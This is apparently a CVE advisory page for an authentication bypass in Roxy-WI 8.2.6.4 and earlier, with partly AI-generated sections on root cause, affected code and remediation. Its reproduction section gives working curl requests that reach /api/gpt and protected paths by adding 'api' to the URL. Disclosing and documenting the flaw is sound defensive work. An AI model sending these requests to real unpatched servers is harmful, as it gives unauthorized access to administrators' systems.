VYPR
← All advisories
High severity8.3NVD Advisory· Published Jun 10, 2026· Updated Jun 10, 2026

CVE-2026-45567

CVE-2026-45567

Description

Roxy-WI versions 8.2.6.4 and prior suffer an authentication bypass via a flawed URL check, allowing unauthenticated access to sensitive endpoints like /api/gpt.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Roxy-WI versions 8.2.6.4 and prior suffer an authentication bypass via a flawed URL check, allowing unauthenticated access to sensitive endpoints like /api/gpt.

Vulnerability

Roxy-WI versions 8.2.6.4 and prior contain an authentication bypass vulnerability. The before_request hook in app/login.py incorrectly skips authentication if the substring api is present anywhere in the request URL, including the query string. This was intended to allow access to the API blueprint, but due to a logic error and a missing decorator on the /api/gpt endpoint, it allows unauthenticated access to that specific route [1].

Exploitation

An unauthenticated attacker can exploit this vulnerability by sending a POST request to the /api/gpt endpoint. The attacker does not require any special privileges or user interaction. The vulnerability is triggered simply by including the substring api in the URL, such as http:///api/gpt [1].

Impact

Successful exploitation of this vulnerability allows an unauthenticated attacker to bypass authentication and directly access the /api/gpt endpoint. This can lead to unauthorized actions or information disclosure, depending on the functionality of the /api/gpt endpoint, which makes an external API call with potentially sensitive license information [1].

Mitigation

At the time of publication, there are no publicly available patches for this vulnerability. Users are advised to monitor the project's security advisories for updates. Roxy-WI versions 8.2.6.4 and prior are affected [1].

References
  1. Authentication bypass via 'api' substring in URL + unauthenticated /api/gpt

AI Insight generated on Jun 10, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2
  • Roxy Wi/Roxy Wiinferred2 versions
    <=8.2.6.4+ 1 more
    • (no CPE)range: <=8.2.6.4
    • (no CPE)range: <=8.2.6.4

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"A global request hook incorrectly bypasses authentication for any URL containing the substring 'api'."

Attack vector

An unauthenticated attacker can exploit this vulnerability by including the substring 'api' anywhere in the request URL, such as in the query string. This bypasses the authentication check in the `check_login` function. Specifically, the `/api/gpt` endpoint, which lacks its own authentication decorators, becomes directly accessible. Additionally, other sensitive routes can be accessed by appending parameters like `?api=1` to their URLs, bypassing the intended authentication mechanisms [ref_id=1].

Affected code

The vulnerability resides in the global `before_request` hook located in `app/login.py` (lines 14-32). The `check_login` function within this hook incorrectly handles URLs containing 'api'. The `/api/gpt` endpoint, which is directly registered on the app and lacks authentication, is detailed in `app/routes/main/routes.py` (lines 171-200) [ref_id=1].

What the fix does

The advisory indicates that no patches are publicly available at the time of publication. The recommended remediation involves replacing the substring check with an explicit allowlist of public endpoints and ensuring that routes like `/api/gpt` are either protected by `@jwt_required()` or moved to the API blueprint where authentication is handled [ref_id=1].

Preconditions

  • authNo authentication is required to exploit this vulnerability.
  • networkThe target server must be accessible over the network.

Reproduction

# /api/gpt — unauthenticated, reaches the handler. ```bash curl -s -o /dev/null -w '/api/gpt → HTTP %{http_code}\n' \ -X POST http://victim.example/api/gpt \ -H 'Content-Type: application/json' -d '{"prompt":"x"}' ```

# Bypass on a normally-auth-required path: append ?api=1. ```bash curl -s -o /dev/null -w '/overview/?api=1 → HTTP %{http_code}\n' \ 'http://victim.example/overview/?api=1' ```

# Same path WITHOUT 'api' in URL → 302 redirect to /login. ```bash curl -s -o /dev/null -w '/overview/?x=1 → HTTP %{http_code}\n' \ 'http://victim.example/overview/?x=1' ``` Live output (commit d72ea494): `/api/gpt → HTTP 500` # 500 from upstream (https://roxy-wi.org/api/gpt unreachable in container) — handler reached without auth. `/overview/?api=1 → HTTP 500` # auth check skipped; reached the handler. `/overview/?x=1 → HTTP 302` # auth check fired; redirected to /login.

The HTTP-status diff between ?api=1 and ?x=1 proves the bypass. [ref_id=1]

Generated on Jun 10, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

1

News mentions

1